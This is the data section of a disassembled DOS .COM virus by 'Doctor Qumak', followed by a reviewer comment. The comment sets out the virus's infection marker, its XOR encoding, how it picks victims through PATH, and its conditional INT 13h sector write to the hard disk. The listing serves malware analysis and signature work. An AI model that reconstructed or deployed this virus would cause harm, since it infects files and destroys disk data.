db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54
|
||||
;0678 4F 52 20 51 55 4D 41 4B
|
||||
db 0Dh,0Ah ;0680 0D 0A
|
||||
|
||||
db 0B6h ;klucz kodowania ;0682 B6
|
||||
|
||||
d_0683 label byte
|
||||
|
||||
x_0000 dw 0080h ;victim DTA offset ;0000 80 00
|
||||
x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10
|
||||
x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B
|
||||
x_0006 dw 1587h ;victim date stamp ;0006 87 15
|
||||
x_0008 dw 0020h ;victim attribute ;0008 20 00
|
||||
|
||||
db 0E9h,0F9h,00h ;000A E9 F9 00
|
||||
db 0E9h,0F0h,01h ;000D E9 F0 01
|
||||
|
||||
x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00
|
||||
x_0016 dw 002Ah ;ptr in environment ;0016 2A 00
|
||||
|
||||
x_0018 dw 678Bh ;??? ;0018 8B 67
|
||||
|
||||
x_001A db 'PATH=' ;001A 50 41 54 48 3D
|
||||
x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00
|
||||
db '.COM', 0 ;0026 2E 43 4F 4D 00
|
||||
db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00
|
||||
db 'OM',0 ;0031 4F 4D 00
|
||||
db 43 dup (' ') ;0034 002B[20]
|
||||
|
||||
;<----- virus DTA
|
||||
x_005F db 04h ;005F 04
|
||||
db '????????COM' ;0060 0008[3F] 43 4F 4D
|
||||
db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00
|
||||
x_0074 db 20h ;attribute found ;0074 20
|
||||
x_0075 dw 9BEFh ;time stamp ;0075 EF 9B
|
||||
x_0077 dw 1587h ;date stamp ;0077 87 15
|
||||
x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00
|
||||
x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00
|
||||
|
||||
db 0EAh,0F0h ;008A EA F0
|
||||
db 0FFh, 00h,0F0h ;008C FF 00 F0
|
||||
db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20
|
||||
;0095 77 6F 72 6C 64 20
|
||||
;009B 66 72 6F 6D 20 6D
|
||||
;00A1 79 20 76 69 72 75
|
||||
;00A7 73 20 21 0D 0A 24
|
||||
;<----- Saved victim bytes
|
||||
x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50
|
||||
|
||||
;contamination pattern
|
||||
x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E
|
||||
|
||||
;<----- file buffer
|
||||
x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E
|
||||
x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50
|
||||
|
||||
x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00
|
||||
db '.COM',0 ;00C6 2E 43 4F 4D 00
|
||||
db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00
|
||||
db 'M',0 ;00D1 4D 00
|
||||
db ' the stuff that should be here' ;00D3 20 74 68 65 20 73
|
||||
;00D9 74 75 66 66 20 74
|
||||
;00DF 68 61 74 20 73 68
|
||||
;00E5 6F 75 6C 64 20 62
|
||||
;00EB 65 20 68 65 72 65
|
||||
x_00F1 dw 0 ;00F1 00 00
|
||||
x_00F3 db 0 ;00F3 00
|
||||
x_00F4 db 0 ;00F4 00
|
||||
x_00F5 dw 0 ;00F5 00 00
|
||||
x_00F7 db 0 ;00F7 00
|
||||
x_00F8 db 0 ;1=no path ;00F8 00
|
||||
seg_a ends
|
||||
|
||||
end start
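Review bot: The data definition `x_0018 dw 678Bh ;???` is left unexplained although the code above resolves it: `mov [bx+18h],di` at 03D6 stores the work-buffer write position (just past the directory path) and `mov di,[si+18h]` at 0497 reloads it before the DTA file name is appended, so a comment such as `;write position in x_001F work buffer (after path)` would replace the `???` — the 678Bh is only a stale run-time value captured from the dump. A header comment collecting the properties the annotations already establish would also help an analyst reading this listing: a 3-byte JMP followed by the 4-byte marker `6Bh,73h,0CAh,0Eh` at offset 3 identifies an infected .COM, the appended body is 489h bytes of which 0F9h are XOR-encoded with a single time-derived key byte kept at d_0683-1, victims are restricted to 0Ah..0FA00h bytes and located through the `PATH=` environment entry, and the `jz l_04E9` at 04E4 (seconds AND 7 == 0) leads to an INT 13h AH=03 sector write to drive 80h instead of to infection. Those are exactly the facts a detection signature or a cleanup routine keys on, and none of them is stated in one place.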
|
||||
|